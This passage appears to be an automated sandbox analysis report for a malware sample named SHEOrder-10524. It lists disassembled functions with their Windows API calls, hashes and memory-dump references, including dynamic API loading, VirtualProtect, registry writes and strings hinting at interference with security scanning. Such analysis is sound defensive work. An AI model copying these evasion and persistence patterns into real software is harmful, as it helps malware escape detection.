                                                                                                                                                                    • Instruction ID: c671f2e4cf120b47933ccc93d239550b5b56732fa40a5ad9f23e1014a0897456
                                                                                                                                                                    • Opcode Fuzzy Hash: e23bf62c629d75fb63a3d4dd2fb8f77c4957902be58d9bbd09a909529584edba
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C116D7C600204AFEB04EFACC8919AE77FDEB49300F614428B418D7250E730ED888F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DD318 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02924798), ref: 028DD35C
                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD394
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD39F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                                    • Opcode ID: 46278242def622b3ce59ac4d46a76ce09f29b375923983ca22db7c209fa860cf
                                                                                                                                                                    • Instruction ID: fbb94b5f2a4141ab92115537bfd3fa0312802e44f0e091cb26daa155ee185046
                                                                                                                                                                    • Opcode Fuzzy Hash: 46278242def622b3ce59ac4d46a76ce09f29b375923983ca22db7c209fa860cf
                                                                                                                                                                    • Instruction Fuzzy Hash: B9116D7C600204AFDB04EFACC8919AE77FDEB49300F614428B418D7250E730E9888F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D7BE8 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028D7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B61
                                                                                                                                                                      • Part of subcall function 028D7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 028D7B67
                                                                                                                                                                      • Part of subcall function 028D7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2543409266-0
                                                                                                                                                                    • Opcode ID: 6b5f71244b27faaa1421261357136323a8b9043e8c4915ca26ee8b9796734c91
                                                                                                                                                                    • Instruction ID: 516ad03ead3eaf9672a8e5e1124bee89b8a8f1334a5874cbc113fc2daf99cbdc
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5f71244b27faaa1421261357136323a8b9043e8c4915ca26ee8b9796734c91
                                                                                                                                                                    • Instruction Fuzzy Hash: C101CC7C604214AFEB04EB68DE51B5E77B9EB48300F604478B515E3381DB34D9088F56
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CE320 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                    • Opcode ID: c00d61578a2a6ebfca277a27ec1454f10a2125403d9dd094d1a778e55543bc15
                                                                                                                                                                    • Instruction ID: 733eb0429129f76870dee56a8c3d2514ef70333e4dff5f277838194bcab4224a
                                                                                                                                                                    • Opcode Fuzzy Hash: c00d61578a2a6ebfca277a27ec1454f10a2125403d9dd094d1a778e55543bc15
                                                                                                                                                                    • Instruction Fuzzy Hash: F0F0C22C704214CAC7207B3DD8889AD2B9A6F41319B38942EA44ADB251CB34EC05C763
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C4D14 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 028C4D1F
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 028C4D31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                    • Opcode ID: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                                                                                                    • Instruction ID: d151d5dc6e0b1b93858a09f95296a7d6ec430693b10f3b77bef2687680d044a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                                                                                                    • Instruction Fuzzy Hash: 82E012FC1052055EFB146F24CC94B3BB36AEFD1745B74449DE808CA168DB38D481AE39
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D7098 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 028D7396
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                    • String ID: H
                                                                                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                                                                                    • Opcode ID: e4c209dc4f75cbd0dcca94459899e7db6dbd010a77d105cf0b13d6585d88f0bf
                                                                                                                                                                    • Instruction ID: 0b972addfa10dc80a2b9417a45bced2e620b623544bf7876485463e907beed55
                                                                                                                                                                    • Opcode Fuzzy Hash: e4c209dc4f75cbd0dcca94459899e7db6dbd010a77d105cf0b13d6585d88f0bf
                                                                                                                                                                    • Instruction Fuzzy Hash: A3B1D078A016499FDB14CF98D880A9DFBF2FF89314F648569E909EB364D730A849CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CE71C Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 028CE73D
                                                                                                                                                                      • Part of subcall function 028CE320: VariantClear.OLEAUT32(?), ref: 028CE32F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 274517740-0
                                                                                                                                                                    • Opcode ID: c27e225d46cda8f52c0d61343bd3f65be88335379bc429c3fc0b82f45b0a49c2
                                                                                                                                                                    • Instruction ID: 277e7b384ab962bc4240ccddc666e69181027d7ae59d6f2cd664aa287bb8671d
                                                                                                                                                                    • Opcode Fuzzy Hash: c27e225d46cda8f52c0d61343bd3f65be88335379bc429c3fc0b82f45b0a49c2
                                                                                                                                                                    • Instruction Fuzzy Hash: B011E53C70061087D720AF2CC8C096727EAEF85B10B34947EEA4ECB245DB30DC44CAA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CE3B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1927566239-0
                                                                                                                                                                    • Opcode ID: 7a58a0064ad42df95ac4d68a899866dc087466586abd5b50f7e45abd46a52e86
                                                                                                                                                                    • Instruction ID: f79cdd021ff17514c2ccf0ab23aeb14753c0977831824821a050e87e6838038c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a58a0064ad42df95ac4d68a899866dc087466586abd5b50f7e45abd46a52e86
                                                                                                                                                                    • Instruction Fuzzy Hash: A331617D904608AFEB10DFACC884AAE77F9EB0C314F648569F909D3240D334E954CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D6D28 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,028D6D75,?,?,?,00000000), ref: 028D6D55
                                                                                                                                                                      • Part of subcall function 028C4C24: SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeFromProgString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4225568880-0
                                                                                                                                                                    • Opcode ID: 2c5c68b3b091c59703d45285617302573cfcd7091912b5afac026fa5563ddeae
                                                                                                                                                                    • Instruction ID: 7b5c6192840e1b63381f204f4c591d1c0f82db7731f9b19d4ae97d1282259694
                                                                                                                                                                    • Opcode Fuzzy Hash: 2c5c68b3b091c59703d45285617302573cfcd7091912b5afac026fa5563ddeae
                                                                                                                                                                    • Instruction Fuzzy Hash: D8E0E53C2006187FE700EB7AEC2194977EDDB49710B710475A901D3600EBB9BE0488A2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C582C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(028C0000,?,00000105), ref: 028C584A
                                                                                                                                                                      • Part of subcall function 028C5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028C0000,028EB790), ref: 028C5AAC
                                                                                                                                                                      • Part of subcall function 028C5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028C0000,028EB790), ref: 028C5ACA
                                                                                                                                                                      • Part of subcall function 028C5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028C0000,028EB790), ref: 028C5AE8
                                                                                                                                                                      • Part of subcall function 028C5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028C5B06
                                                                                                                                                                      • Part of subcall function 028C5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028C5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028C5B4F
                                                                                                                                                                      • Part of subcall function 028C5A90: RegQueryValueExA.ADVAPI32(?,028C5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028C5B95,?,80000001), ref: 028C5B6D
                                                                                                                                                                      • Part of subcall function 028C5A90: RegCloseKey.ADVAPI32(?,028C5B9C,00000000,?,?,00000000,028C5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028C5B8F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                                    • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                                    • Instruction ID: b684474cf3e10d67184fcf64cf868a4947964ddf57e6d740567d780a6f32cb1a
                                                                                                                                                                    • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5AE06D79A002148BCF10DE5C88C0A5733D8AB08754F540965EC68DF346D775E9208BD1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C7D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 028C7DB0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                    • Instruction ID: 216b4fb0a322360df2e071e92cbae30ea2e932e474f64a2c120090e3efd94335
                                                                                                                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8CD05B7A3091107AD220A55E5C44EB75BDCCBC9771F10063DB668C3180D730CC018671
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CC320 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,029245F0,?,028DE40F,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,OpenSession), ref: 028CC337
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 514040917-0
                                                                                                                                                                    • Opcode ID: 1aeb287b82d92dcec84f61b09f5a20fe5ff591df168de0831e92b6ca4949017a
                                                                                                                                                                    • Instruction ID: c2ad46828e31590d33d6756da2190cd3197532a4c8bccb9841ce99d7a2aa0a90
                                                                                                                                                                    • Opcode Fuzzy Hash: 1aeb287b82d92dcec84f61b09f5a20fe5ff591df168de0831e92b6ca4949017a
                                                                                                                                                                    • Instruction Fuzzy Hash: E1D0A9AAB006242BE200E16C2C818BB328E8B88B20F2000356998CA282FB618E4006D2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C7E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,028DE0EE,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanString,02924344,028E8FEC,UacScan,02924344,028E8FEC,UacInitialize), ref: 028C7E23
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                    • Opcode ID: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                                                                    • Instruction ID: 5834f73c749ad46a5604e9c592e74de721481319f11c082bbde0814e549f0402
                                                                                                                                                                    • Opcode Fuzzy Hash: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                                                                    • Instruction Fuzzy Hash: 50C08CEE202300065A9461FC0CC44AA438C098413D3340B3DB02CD63E2E331C8566C61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C7E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,028E1133,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,ScanString), ref: 028C7E47
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                    • Opcode ID: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                                                                    • Instruction ID: fdcc5f529ff9fb79787a7c657beceed70db144fa239f4f1f551dd0196f384b99
                                                                                                                                                                    • Opcode Fuzzy Hash: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                                                                    • Instruction Fuzzy Hash: C3C08CFE6023040E5ED062FC1CC06E9428E09849397301B2DF02CE62D2E331D8662C21
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C4C3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                                    • Opcode ID: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                                                                                                    • Instruction ID: 3113ca4103ff78e9e83302b521b78450581d180c258a5fc224cee3db430a6002
                                                                                                                                                                    • Opcode Fuzzy Hash: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                                                                                                    • Instruction Fuzzy Hash: 7AC012AD60022047FF21965CDCC075562CC9B05295B2400A5E51CD7255E774D8409665
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C4C60 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
                                                                                                                                                                    • SysReAllocStringLen.OLEAUT32(028E9E68,028DD42C,00000016), ref: 028C4C7A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                    • Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                                                                    • Instruction ID: e087cc7568d8acbe2bb19650e5cc7ccd180c600b70e9ae6e15d52f28e1260abf
                                                                                                                                                                    • Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                                                                    • Instruction Fuzzy Hash: E8D080FC5001015EBF3C9519C974936A1AEDAE030F77CCA5D980ECA164EB79D4C0CA35
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028E9B54 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • timeSetEvent.WINMM(00002710,00000000,028E9B48,00000000,00000001), ref: 028E9B64
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Eventtime
                                                                                                                                                                    • String ID:
